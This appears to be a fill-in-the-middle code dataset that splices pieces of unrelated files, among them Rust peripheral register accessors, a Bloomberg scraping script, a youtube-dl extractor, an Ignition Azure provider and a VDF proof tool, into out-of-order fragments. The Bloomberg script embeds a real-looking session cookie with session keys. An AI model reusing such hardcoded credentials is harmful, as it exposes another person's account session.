impl<'a> _CC1DEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 9;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _UDEW<'a> {
w: &'a mut W,
}
impl<'a> _UDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 8;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _BIEW<'a> {
w: &'a mut W,
}
impl<'a> _BIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 7;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _TIEW<'a> {
w: &'a mut W,
}
impl<'a> _TIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 6;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _COMIEW<'a> {
w: &'a mut W,
}
impl<'a> _COMIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 5;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _CC1IEW<'a> {
w: &'a mut W,
}
impl<'a> _CC1IEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 1;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _UIEW<'a> {
w: &'a mut W,
}
impl<'a> _UIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 0;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
impl R {
#[doc = r" Value of the register as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
#[doc = "Bit 14 - Trigger DMA request enable"]
#[inline]
pub fn tde(&self) -> TDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 14;
((self.bits >> OFFSET) & MASK as u32) != 0
};
TDER { bits }
}
#[doc = "Bit 13 - COM DMA request enable"]
#[inline]
pub fn comde(&self) -> COMDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 13;
((self.bits >> OFFSET) & MASK as u32) != 0
};
COMDER { bits }
}
#[doc = "Bit 9 - Capture/Compare 1 DMA request enable"]
#[inline]
pub fn cc1de(&self) -> CC1DER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 9;
((self.bits >> OFFSET) & MASK as u32) != 0
};
CC1DER { bits }
}
#[doc = "Bit 8 - Update DMA request enable"]
#[inline]
pub fn ude(&self) -> UDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 8;
((self.bits >> OFFSET) & MASK as u32) != 0
};
UDER { bits }
}
#[doc = "Bit 7 - Break interrupt enable"]
#[inline]
pub fn bie(&self) -> BIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 7;
((self.bits >> OFFSET) & MASK as u32) != 0
};
BIER { bits }
}
#[doc = "Bit 6 - Trigger interrupt enable"]
#[inline]
pub fn tie(&self) -> TIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 6;
((self.bits >> OFFSET) & MASK as u32) != 0
};
TIER { bits }
}
#[doc = "Bit 5 - COM interrupt enable"]
#[inline]
pub fn comie(&self) -> COMIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 5;
((self.bits >> OFFSET) & MASK as u32) != 0
};
COMIER { bits }
}
#[doc = "Bit 1 - Capture/Compare 1 interrupt enable"]
#[inline]
pub fn cc1ie(&self) -> CC1IER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 1;
((self.bits >> OFFSET) & MASK as u32) != 0
};
CC1IER { bits }
}
#[doc = "Bit 0 - Update interrupt enable"]
#[inline]
pub fn uie(&self) -> UIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 0;
((self.bits >> OFFSET) & MASK as u32) != 0
};
UIER { bits }
}
}
impl W {
#[doc = r" Reset value of the register"]
#[inline]
pub fn reset_value() -> W {
W { bits: 0 }
}
#[doc = r" Writes raw bits to the register"]
#[inline]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
#[doc = "Bit 14 - Trigger DMA request enable"]
#[inline]
pub fn tde(&mut self) -> _TDEW {
_TDEW { w: self }
}
#[doc = "Bit 13 - COM DMA request enable"]
#[inline]
pub fn comde(&mut self) -> _COMDEW {
_COMDEW { w: self }
}
#[doc = "Bit 9 - Capture/Compare 1 DMA request enable"]
#[inline]
pub fn cc1de(&mut self) -> _CC1DEW {
_CC1DEW { w: self }
}
#[doc = "Bit 8 - Update DMA request enable"]
#[inline]
pub fn ude(&mut self) -> _UDEW {
_UDEW { w: self }
}
#[doc = "Bit 7 - Break interrupt enable"]
#[inline]
pub fn bie(&mut self) -> _BIEW {
_BIEW { w: self }
}
#[doc = "Bit 6 - Trigger interrupt enable"]
#[inline]
pub fn tie(&mut self) -> _TIEW {
_TIEW { w: self }
}
#[doc = "Bit 5 - COM interrupt enable"]
#[inline]
pub fn comie(&mut self) -> _COMIEW {
_COMIEW { w: self }
}
#[doc = "Bit 1 - Capture/Compare 1 interrupt enable"]
#[inline]
pub fn cc1ie(&mut self) -> _CC1IEW {
_CC1IEW { w: self }
}
#[doc = "Bit 0 - Update interrupt enable"]
#[inline]
pub fn uie(&mut self) -> _UIEW {
_UIEW { w: self }
}
} | self.bits
}
|
hot-reload.js | const filesInDirectory = (dir) =>
new Promise((resolve) =>
dir.createReader().readEntries((entries) =>
Promise.all(
entries
.filter((e) => e.name[0] !== ".")
.map((e) =>
e.isDirectory
? filesInDirectory(e)
: new Promise((resolve) => e.file(resolve))
)
)
.then((files) => [].concat(...files))
.then(resolve)
)
);
const timestampForFilesInDirectory = (dir) =>
filesInDirectory(dir).then((files) =>
files.map((f) => f.name + f.lastModifiedDate).join() | timestampForFilesInDirectory(dir).then((timestamp) => {
if (!lastTimestamp || lastTimestamp === timestamp) {
setTimeout(() => watchChanges(dir, timestamp), 1000); // retry after 1s
} else {
chrome.runtime.reload();
}
});
};
chrome.management.getSelf((self) => {
if (self.installType === "development") {
chrome.runtime.getPackageDirectoryEntry((dir) => watchChanges(dir));
chrome.tabs.query({ active: true, lastFocusedWindow: true }, (tabs) => {
// NB: see https://github.com/xpl/crx-hotreload/issues/5
if (tabs[0]) {
chrome.tabs.reload(tabs[0].id);
}
});
}
}); | );
const watchChanges = (dir, lastTimestamp) => { |
bitfilter.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
from prjxray.util import OpenSafeFile
class Bitfilter(object):
def | (
self, frames_to_include=None, frames_to_exclude=[],
bits_to_exclude=[]):
self.frames_to_include = frames_to_include
self.frames_to_exclude = frames_to_exclude
self.bits_to_exclude = bits_to_exclude
def filter(self, frame, bit):
if self.frames_to_include is not None:
if frame in self.frames_to_include:
return True
if frame in self.frames_to_exclude:
return False
if (frame, bit) in self.bits_to_exclude:
return False
return True
BITFILTERS = {
('artix7', 'INT'):
Bitfilter(
frames_to_exclude=[
30,
31,
],
bits_to_exclude=[
#
(0, 36)
]),
}
def get_bitfilter(part, tile):
""" Returns bitfilter for specified part and tile.
Either returns bitfilter to specified part and tile type, or the default
bitfilter, which includes all bits.
"""
key = (part, tile)
if key in BITFILTERS:
return BITFILTERS[key].filter
else:
return None
| __init__ |
bloomberg-api.py | import requests
import json
from datetime import datetime
import os
REQUEST_HEADERS = {
'authority': 'www.bloomberg.com',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-gpc': '1',
'sec-fetch-site': 'none',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'accept-language': 'en-US,en;q=0.9',
'cookie': 'agent_id=9f2bb4ef-7f2c-4837-8414-1adec058b7af; session_id=75e8806c-c818-4cfa-bc14-ffad41c591ad; session_key=cedbe85aa42ce389de11f95467b8511719ac1286; gatehouse_id=3a08ccd6-8ec7-4e6f-bade-70f0296e8f02; geo_info=%7B%22countryCode%22%3A%22DE%22%2C%22country%22%3A%22DE%22%2C%22field_n%22%3A%22cp%22%2C%22trackingRegion%22%3A%22Europe%22%2C%22cacheExpiredTime%22%3A1637767817335%2C%22region%22%3A%22Europe%22%2C%22fieldN%22%3A%22cp%22%7D%7C1637767817335; _pxvid=41425bb6-47bd-11ec-af6d-5244734f5643; _sp_v1_uid=1:444:3e22b8d4-371e-48fa-aeba-4be890c01d4f; _sp_v1_ss=1:H4sIAAAAAAAAAItWqo5RKimOUbLKK83J0YlRSkVil4AlqmtrlXQGVlk0kYw8EMOgNhaXkfSQUIoFAORdi1xUAQAA; _sp_v1_csv=null; _sp_v1_lt=1:; ccpaUUID=ec9c365a-fe56-4ca0-9af9-0824a3e25686; dnsDisplayed=true; ccpaApplies=true; signedLspa=false; _sp_krux=true; consentUUID=b6028d5a-191a-4417-a42a-9c0b5031c567_1; euconsent-v2=CPP02HiPP02HiAGABCENB1CgAP_AAGPAAAYgH9oB9CpGCTFDKGh4AIsAEAQXwBAEAOAAAAABAAAAAAgQAIwCAEASAACAAAACAAAAIAIAAAAAEAAAAAAAQAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAIEAAAAAAUAAABAAgEAAABIAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYtARAAcACEAHIAPwAvgCOAIHAQcBCACIgEWALqAYEA14B1AFlALzAYsAUMgCABMAEcARwBeYSAoAAsACoAGQAOAAgABkADSAIgAigBMACeAH4AQgAjgBSgDKAHeAPYAjgBKQGSCoAoATABHAEcAU2AvMdAYAAWABUADIAHAAQAAuABkADSAIgAigBMACeAGIAPwAjgBMACjAFKAMoAd4A9gCOAEpAOoAyQcABAAuQgFAALAAyAC4AJgAYgBHADvAI4ASkA6hKAYAAsADIAHAAiABMADEAI4AUYApQB3gEcAOoSAAgAXKQEwAFgAVAAyABwAEAAMgAaQBEAEUAJgATwAxAB-AFGAKUAZQA7wCOAEpAZIUABAAXAJ2AAA.YAAAAAAAAAAA; consentUUID=b6028d5a-191a-4417-a42a-9c0b5031c567_1; _sp_v1_data=2:392777:1637163871:0:1:-1:1:0:0:_:-1; _sp_v1_opt=1:login|true:last_id|11:; _sp_v1_consent=1\u00210:-1:-1:-1:-1:-1; bbgconsentstring=req1fun1pad1; bdfpc=004.0798118908.1637163875871; _gcl_au=1.1.1720942935.1637163876; _uetvid=44e8114047bd11ec92b22f9017b0ecd7; _ga=GA1.2.1490423973.1637163877; _rdt_uuid=1637163877464.5392f96e-6945-409f-b570-c991ab7f3ac3; _scid=4cb379ec-1c36-4923-830a-f3d912592400; _parsely_visitor={%22id%22:%22pid=ec7166d70d0618210d77ec91c9ff47fc%22%2C%22session_count%22:1%2C%22last_session_ts%22:1637163878100}; _fbp=fb.1.1637163878386.322604158; __gads=ID=780c8d3c1717c19b:T=1637163876:S=ALNI_MYhi11N9mUsWpAG6mTst5btaNzE1w; _lc2_fpi=b1166d620485--01fmq94jsganf9p3gdwdy59x2d; _cc_id=c7ad973acd6d72e5dd868e2f901ccdb4; _cc_cc=ACZ4XmNQSDZPTLE0N05MTjFLMTdKNU1JsTCzSDVKszQwTE5OSTJhAILEqcrpIBoChLec3aPDeCiO4T8jI8PWlfelYezNSOxNSOzlt2eKw9QsRBJfux6h98oqBHvbWgT7%2BKYpLDC9Hz9bwpjnjh5ihrHPL54DV3Lj1CM2mPglJPZhJDXTT6jDlPzu6oL7ZM2Gp9wwcQAeRl6M; _cc_aud=ABR4XmNgYGBInKqcDqQggJmBNbMIxGTNLARRXOV3gSQAUxcEoQ%3D%3D',
'if-none-match': 'W/"a43-hxXAwL51kj9ckR6Knjaq6P7qNF8"',
}
SEARCH_RESPONSE_SAVE_DIR = "search_responses"
FINDATA_RESPONSE_SAVE_DIR = "findata_responses"
class moduleUtils():
"""class name gives it away"""
def save_bloomberg_ticker(ticker: str):
"""function to save the ticker for future financial-data-API requests. To skip the
get_bloomberg_ticker() method when possible. Will be written to bloomberg_tickers.txt"""
pass
def get_api_no_header(url: str):
"""utils. gets and parses json-response. Yes, this is OOP hell"""
response = requests.get(url)
response_dict = response.json()
return response_dict
def check_if_query_already_saved(query: str):
"""takes bloomberg-ticker and checks, if bloomberg-search-API call is needed or ticker has been"""
pass
def safe_save_jsondict(dir: str, json_dict: dict):
"""archives response, even if dir isnt created yet."""
tag = datetime.now().strftime("%y%m%d_%H%M%S")
if os.path.exists(dir) == True:
with open(os.path.join(dir, f"{tag}.json"), "w") as f:
f.write(json.dumps(json_dict))
elif os.path.exists(dir) == False:
os.mkdir(dir)
with open(os.path.join(dir, f"{tag}.json"), "w") as f:
f.write(json.dumps(json_dict))
def save_json_response(json_response: dict, response_type: str):
"""saves dict from API json response neatly. Second arg needs to be either "search" or "financial"."""
if response_type == "search":
moduleUtils.safe_save_jsondict(SEARCH_RESPONSE_SAVE_DIR, json_response)
elif response_type == "findata":
moduleUtils.safe_save_jsondict(FINDATA_RESPONSE_SAVE_DIR, json_response)
else:
print("save_json_response() seems response_type doesn't fit.")
class bloombergAPI():
"""core functions of the module"""
def get_bloomberg_ticker(query: str):
|
def get_bloomberg_financials(ticker: str):
"""this method takes a bloomberg-ticker to get bloomberg data-strip-API financial data. Returns
dict with all the data"""
url = f"https://www.bloomberg.com/markets2/api/datastrip/{ticker}?locale=en"
response = requests.get(url, headers=REQUEST_HEADERS)
response_dict = json.loads(response.text)[0]
return response_dict
query = "peloton"
num_finds, search_response_unformatted, first_find_unformatted, ticker, query = bloombergAPI.get_bloomberg_ticker(query)
findata_response = bloombergAPI.get_bloomberg_financials(ticker)
print(findata_response)
moduleUtils.save_json_response(search_response_unformatted, "search")
moduleUtils.save_json_response(findata_response, "findata")
| """sends GET request to bloomberg.com search API with operator "query" as query. To find non-general,
specific finds, please consult list_dicts_finds output"""
formatted_query = query.replace(" ", "%20")
url = f"https://search.bloomberg.com/lookup.json?query={formatted_query}"
response_dict = moduleUtils.get_api_no_header(url)
num_finds = response_dict.get("total_results")
first_find_unformatted = response_dict.get("results")[0]
bloomberg_ticker = response_dict.get("results")[0].get("ticker_symbol")
return num_finds, response_dict, first_find_unformatted, bloomberg_ticker, query |
lib.rs | #![no_std]
#![feature(test)]
extern crate kuznyechik;
extern crate test;
extern crate block_cipher_trait; | use test::Bencher;
use block_cipher_trait::{BlockCipher, BlockCipherFixKey};
use generic_array::GenericArray;
#[bench]
pub fn encrypt(bh: &mut Bencher) {
let key = Default::default();
let state = kuznyechik::Kuznyechik::new(&key);
let data = [1u8; 16];
let input = GenericArray::from_slice(&data);
let mut output = GenericArray::default();
bh.iter(|| {
state.encrypt_block(input, &mut output);
});
bh.bytes = 16u64;
} | extern crate generic_array;
|
palcomp3.py | # coding: utf-8
from __future__ import unicode_literals
import re
from ..compat import compat_str
from ..utils import int_or_none, str_or_none, try_get
from .common import InfoExtractor
class PalcoMP3BaseIE(InfoExtractor):
_GQL_QUERY_TMPL = """{
artist(slug: "%s") {
%s
}
}"""
_ARTIST_FIELDS_TMPL = """music(slug: "%%s") {
%s
}"""
_MUSIC_FIELDS = """duration
hls
mp3File
musicID
plays
title"""
def _call_api(self, artist_slug, artist_fields):
return self._download_json(
"https://www.palcomp3.com.br/graphql/",
artist_slug,
query={
"query": self._GQL_QUERY_TMPL % (artist_slug, artist_fields),
},
)["data"]
def _parse_music(self, music):
music_id = compat_str(music["musicID"])
title = music["title"]
formats = []
hls_url = music.get("hls")
if hls_url:
formats.append(
{
"url": hls_url,
"protocol": "m3u8_native",
"ext": "mp4",
}
)
mp3_file = music.get("mp3File")
if mp3_file:
formats.append(
{
"url": mp3_file,
}
)
return {
"id": music_id,
"title": title,
"formats": formats,
"duration": int_or_none(music.get("duration")),
"view_count": int_or_none(music.get("plays")),
}
def _real_initialize(self):
self._ARTIST_FIELDS_TMPL = self._ARTIST_FIELDS_TMPL % self._MUSIC_FIELDS
def _real_extract(self, url):
artist_slug, music_slug = re.match(self._VALID_URL, url).groups()
artist_fields = self._ARTIST_FIELDS_TMPL % music_slug
music = self._call_api(artist_slug, artist_fields)["artist"]["music"]
return self._parse_music(music)
class PalcoMP3IE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:song"
_VALID_URL = (
r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<artist>[^/]+)/(?P<id>[^/?&#]+)"
)
_TESTS = [
{
"url": "https://www.palcomp3.com/maiaraemaraisaoficial/nossas-composicoes-cuida-bem-dela/",
"md5": "99fd6405b2d8fd589670f6db1ba3b358",
"info_dict": {
"id": "3162927",
"ext": "mp3",
"title": "Nossas Composições - CUIDA BEM DELA",
"duration": 210,
"view_count": int,
},
}
] | @classmethod
def suitable(cls, url):
return (
False
if PalcoMP3VideoIE.suitable(url)
else super(PalcoMP3IE, cls).suitable(url)
)
class PalcoMP3ArtistIE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:artist"
_VALID_URL = r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<id>[^/?&#]+)"
_TESTS = [
{
"url": "https://www.palcomp3.com.br/condedoforro/",
"info_dict": {
"id": "358396",
"title": "Conde do Forró",
},
"playlist_mincount": 188,
}
]
_ARTIST_FIELDS_TMPL = """artistID
musics {
nodes {
%s
}
}
name"""
@classmethod
def suitable(cls, url):
return (
False
if re.match(PalcoMP3IE._VALID_URL, url)
else super(PalcoMP3ArtistIE, cls).suitable(url)
)
def _real_extract(self, url):
artist_slug = self._match_id(url)
artist = self._call_api(artist_slug, self._ARTIST_FIELDS_TMPL)["artist"]
def entries():
for music in try_get(artist, lambda x: x["musics"]["nodes"], list) or []:
yield self._parse_music(music)
return self.playlist_result(
entries(), str_or_none(artist.get("artistID")), artist.get("name")
)
class PalcoMP3VideoIE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:video"
_VALID_URL = r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<artist>[^/]+)/(?P<id>[^/?&#]+)/?#clipe"
_TESTS = [
{
"url": "https://www.palcomp3.com/maiaraemaraisaoficial/maiara-e-maraisa-voce-faz-falta-aqui-ao-vivo-em-vicosa-mg/#clipe",
"add_ie": ["Youtube"],
"info_dict": {
"id": "_pD1nR2qqPg",
"ext": "mp4",
"title": "Maiara e Maraisa - Você Faz Falta Aqui - DVD Ao Vivo Em Campo Grande",
"description": "md5:7043342c09a224598e93546e98e49282",
"upload_date": "20161107",
"uploader_id": "maiaramaraisaoficial",
"uploader": "Maiara e Maraisa",
},
}
]
_MUSIC_FIELDS = "youtubeID"
def _parse_music(self, music):
youtube_id = music["youtubeID"]
return self.url_result(youtube_id, "Youtube", youtube_id) | |
index.js | import DistanceItem from './DistanceItem' |
export default DistanceItem |
|
ASTCompiler.js | function Compile (el, templateDescriptor, model, options) {
this.model = model
this.$vm = Object.assign({}, model.data, model.methods, options.inject)
this.$el = document.querySelector(el)
if (this.$el) {
this.$fragment = this.node2Fragment()
this.init(templateDescriptor)
this.$el.appendChild(this.$fragment)
}
} | function createElement (tag, data, childrens = []) {
const dom = document.createElement(tag)
const attrs = (data && data.attrs) ? data.attrs : {}
Object.keys(attrs).forEach((attr) => {
dom.setAttribute(attr, data.attrs[attr])
})
if (data && (data.class || data.staticClass)) {
dom.setAttribute('class', ((data.class ? data.class : ' ') + ' ' + (data.staticClass ? data.staticClass : ' ')).trim())
}
childrens && childrens.forEach((child) => {
dom.appendChild(child)
})
return dom
}
Compile.prototype = {
node2Fragment: function () {
var fragment = document.createDocumentFragment()
return fragment
},
init: function (templateDescriptor) {
this.$vm.ast = templateDescriptor.ast
this.$vm.render = new Function(templateDescriptor.render)
this.$vm._c = createElement
this.$vm._e = document.createComment.bind(document, '')
// this.$vm._v = document.createTextNode;
this.$vm._v = document.createTextNode.bind(document)
this.$vm._s = (str) => {
return `${str.toString()}`
}
let res = this.$vm.render()
this.$fragment.appendChild(res)
this.compileElement(this.$fragment, [this.$vm.ast])
this.model.mounted.call(this.$vm)
},
compileElement: function (el, ast) {
var childNodes = el.childNodes;
[].slice.call(childNodes).forEach((node, index) => {
if (this.isElementNode(node) || this.isTextNode(node)) {
this.compile(node, ast[index])
}
if (node.childNodes && node.childNodes.length) {
this.compileElement(node, ast[index].children)
}
})
},
compile: function (node, ast) {
if (ast.events) {
const self = this
Object.keys(ast.events).forEach((event) => {
if (event === 'click') {
const exp = ast.events[event].value
const fn = self.$vm[exp]
node.addEventListener('click', fn.bind(self.$vm), false)
}
if (event === 'mousedown') {
const exp = ast.events[event].value
const fn = self.$vm[exp]
node.addEventListener('mousedown', fn.bind(self.$vm), false)
}
})
}
},
isDirective: function (attr) {
return attr.indexOf('v-') === 0
},
isEventDirective: function (dir) {
return dir.indexOf('on') === 0
},
isElementNode: function (node) {
return node.nodeType === 1
},
isTextNode: function (node) {
return node.nodeType === 3
}
}
export default Compile | |
azure.go | // Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// The azure provider fetches a configuration from the Azure OVF DVD.
package azure
import (
"fmt"
"io/ioutil"
"os"
"path/filepath"
"syscall"
"time"
"github.com/coreos/ignition/config/types"
"github.com/coreos/ignition/config/validate/report"
"github.com/coreos/ignition/internal/log"
"github.com/coreos/ignition/internal/providers/util"
"github.com/coreos/ignition/internal/resource"
)
const (
configDevice = "/dev/disk/by-id/ata-Virtual_CD"
configPath = "/CustomData.bin"
)
// These constants come from <cdrom.h>.
const (
CDROM_DRIVE_STATUS = 0x5326
)
// These constants come from <cdrom.h>.
const (
CDS_NO_INFO = iota
CDS_NO_DISC
CDS_TRAY_OPEN
CDS_DRIVE_NOT_READY
CDS_DISC_OK
)
func FetchConfig(f resource.Fetcher) (types.Config, report.Report, error) {
logger := f.Logger
logger.Debug("waiting for config DVD...")
waitForCdrom(logger)
mnt, err := ioutil.TempDir("", "ignition-azure")
if err != nil {
return types.Config{}, report.Report{}, fmt.Errorf("failed to create temp directory: %v", err)
}
defer os.Remove(mnt)
| ); err != nil {
return types.Config{}, report.Report{}, fmt.Errorf("failed to mount device %q at %q: %v", configDevice, mnt, err)
}
defer logger.LogOp(
func() error { return syscall.Unmount(mnt, 0) },
"unmounting %q at %q", configDevice, mnt,
)
logger.Debug("reading config")
rawConfig, err := ioutil.ReadFile(filepath.Join(mnt, configPath))
if err != nil && !os.IsNotExist(err) {
return types.Config{}, report.Report{}, fmt.Errorf("failed to read config: %v", err)
}
return util.ParseConfig(logger, rawConfig)
}
func waitForCdrom(logger *log.Logger) {
for !isCdromPresent(logger) {
time.Sleep(time.Second)
}
}
func isCdromPresent(logger *log.Logger) bool {
logger.Debug("opening config device")
device, err := os.Open(configDevice)
if err != nil {
logger.Info("failed to open config device: %v", err)
return false
}
defer device.Close()
logger.Debug("getting drive status")
status, _, errno := syscall.Syscall(
syscall.SYS_IOCTL,
uintptr(device.Fd()),
uintptr(CDROM_DRIVE_STATUS),
uintptr(0),
)
switch status {
case CDS_NO_INFO:
logger.Info("drive status: no info")
case CDS_NO_DISC:
logger.Info("drive status: no disc")
case CDS_TRAY_OPEN:
logger.Info("drive status: open")
case CDS_DRIVE_NOT_READY:
logger.Info("drive status: not ready")
case CDS_DISC_OK:
logger.Info("drive status: OK")
default:
logger.Err("failed to get drive status: %s", errno.Error())
}
return (status == CDS_DISC_OK)
} | logger.Debug("mounting config device")
if err := logger.LogOp(
func() error { return syscall.Mount(configDevice, mnt, "udf", syscall.MS_RDONLY, "") },
"mounting %q at %q", configDevice, mnt, |
test_reconstruct.py | import pytest
from os.path import join
import mackinac
@pytest.mark.fixtures('download_data')
class TestReconstruct:
def test_reconstruct_features(self, universal_folder, bacteria_folder, b_theta_features,
b_theta_summary, b_theta_id):
template = mackinac.create_template_model(
universal_folder,
bacteria_folder,
'bacteria',
'Bacteria template')
model = mackinac.reconstruct_model_from_features( | 'negbio',
gc_content=b_theta_summary['gc_content'] / 100.0
)
assert model.id == b_theta_id
assert len(model.reactions) == 923 # Value can change if genome annotation changes
assert len(model.metabolites) == 999 # Value can change if genome annotation changes
assert len(model.compartments) == 2
def test_reconstruct_likelihoods(self, universal_folder, bacteria_folder, b_theta_features,
b_theta_summary, b_theta_id, search_program_path,
search_db_path, fid_role_path, work_folder):
template = mackinac.create_template_model(
universal_folder,
bacteria_folder,
'bacteria',
'Bacteria template')
likelihoods = mackinac.calculate_likelihoods(
b_theta_id,
b_theta_features,
template,
search_program_path=search_program_path,
search_db_path=search_db_path,
fid_role_path=fid_role_path,
work_folder=work_folder)
assert len(likelihoods.reaction_values) == 5652
assert likelihoods.reaction_values['rxn00006']['likelihood'] == 0.0
assert pytest.approx(likelihoods.reaction_values['rxn14380']['likelihood'], 0.9594912486067599)
model = mackinac.reconstruct_model_from_likelihoods(
likelihoods,
template,
b_theta_id,
'negbio',
gc_content=b_theta_summary['gc_content'] / 100.0
)
assert model.id == b_theta_id
assert len(model.reactions) == 1164 # Value can change if genome annotation changes
assert len(model.metabolites) == 1260 # Value can change if genome annotation changes
assert len(model.compartments) == 2 | b_theta_features,
template,
b_theta_id, |
cmds.py | import argparse
import binascii
import sys
import time
from inkfish.proof_of_time import (create_proof_of_time_wesolowski,
create_proof_of_time_nwesolowski,
create_proof_of_time_pietrzak,
check_proof_of_time_wesolowski,
check_proof_of_time_nwesolowski,
check_proof_of_time_pietrzak)
from .classgroup import ClassGroup
from .create_discriminant import create_discriminant
def | ():
parser = argparse.ArgumentParser(
description='Generate or verify a proof of time using the Chia ' +
'Verfiable Delay Function (VDF)',
)
parser.add_argument("-t", "--type", default="wesolowski",
choices=["wesolowski", "n-wesolowski", "pietrzak"],
help="the type of proof, wesolowski, n-wesolowski, or pietrzak")
parser.add_argument("-l", "--length", type=int, default=2048,
help="the number of bits of the discriminant")
parser.add_argument("-d", "--depth", type=int, default=2,
help="depth of n-wesolowski (n) default is 2")
parser.add_argument("-v", "--verbose", action="store_true",
help="print a bunch of extra stuff about the proof")
parser.add_argument("discriminant_challenge", type=binascii.unhexlify,
help="a hex-encoded challenge used to derive the discriminant")
parser.add_argument("iterations", type=int,
help="number of iterations")
parser.add_argument("proof", type=binascii.unhexlify,
help="the hex-encoded proof", nargs="?")
return parser
def pot(args=sys.argv):
parser = create_pot_parser()
args = parser.parse_args(args=args[1:])
discriminant = create_discriminant(args.discriminant_challenge, args.length)
if args.verbose:
print("proof type: %s" % args.type)
print("discriminant: %s" % discriminant)
print("discriminant size: %s" % args.length)
# Generator element is created as a=2, b=1.
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
if args.verbose:
print("x: %s" % str(x))
if args.proof:
